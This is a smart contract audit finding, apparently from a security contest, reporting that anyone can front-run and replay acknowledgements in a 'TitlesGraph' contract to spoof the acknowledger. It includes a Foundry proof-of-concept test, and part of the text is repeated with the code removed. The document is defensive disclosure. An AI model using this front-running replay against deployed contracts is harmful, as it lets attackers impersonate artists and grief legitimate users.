There are two variants, one without ECDSA signature and one with ECDSA signature.
The problem is that a malicious user can front-run any acknowledgement made, spoofing himself as the person that made the acknowledgement. Spoofing the address has been confirmed as a potential issue by the sponsor.
Proof of Concept
Put this in TitleGraph.t.sol:
function test_poc_ack() public {
Mock1271Signer signer = new Mock1271Signer();
bytes memory jtmb = signer.JTMB();
address malicious_user = makeAddr("malicious_user");
Edge memory edge = Edge({
from: Node({
nodeType: NodeType.COLLECTION_ERC1155,
entity: Target({target: address(this), chainId: block.chainid}),
creator: Target({target: address(2), chainId: block.chainid}),
data: ""
}),
to: Node({
nodeType: NodeType.TOKEN_ERC1155,
entity: Target({target: address(3), chainId: block.chainid}),
creator: Target({target: address(signer), chainId: block.chainid}),
data: abi.encode(42)
}),
acknowledged: true,
data: ""
});
// Create the edge
titlesGraph.createEdge(edge.from, edge.to, "");
bytes32 edgeId = titlesGraph.getEdgeId(edge);
// This is a valid sig - this gets front-ran by a malicious user
// titlesGraph.acknowledgeEdge(edgeId, new bytes(0), jtmb);
// This call succeed.
vm.prank(malicious_user);
titlesGraph.acknowledgeEdge(edgeId, new bytes(0), jtmb);
// If the original signer wants to sign again it will revert.
vm.expectRevert(Unauthorized.selector);
titlesGraph.acknowledgeEdge(edgeId, new bytes(0), jtmb);
}
If we look at the traces we will see that the malicious_user will be the address that acknowledged the edge:
zoyi
medium
Anyone can grieve acknowledgements
Summary
Front-running and copying an acknowledgement can lead to spoofing.
Vulnerability Detail
A person can call
acknowledgeEdge
to acknowledge an edge:There are two variants, one without ECDSA signature and one with ECDSA signature.
The problem is that a malicious user can front-run any
acknowledgement
made, spoofing himself as the person that made the acknowledgement. Spoofing the address has been confirmed as a potential issue by the sponsor.Proof of Concept
Put this in
TitleGraph.t.sol
:If we look at the traces we will see that the
malicious_user
will be the address that acknowledged the edge:This is especially problematic with the issue of address poisoning.
Impact
A malicious user can craft an address that looks very similar to a big AI artist and spoof an acknowledgement coming from them.
Code Snippet
TitlesGraph.sol#L118-L124
Tool used
Manual Review
Recommendation
Do not emit
msg.sender
as theacknowledger
.Duplicate of #273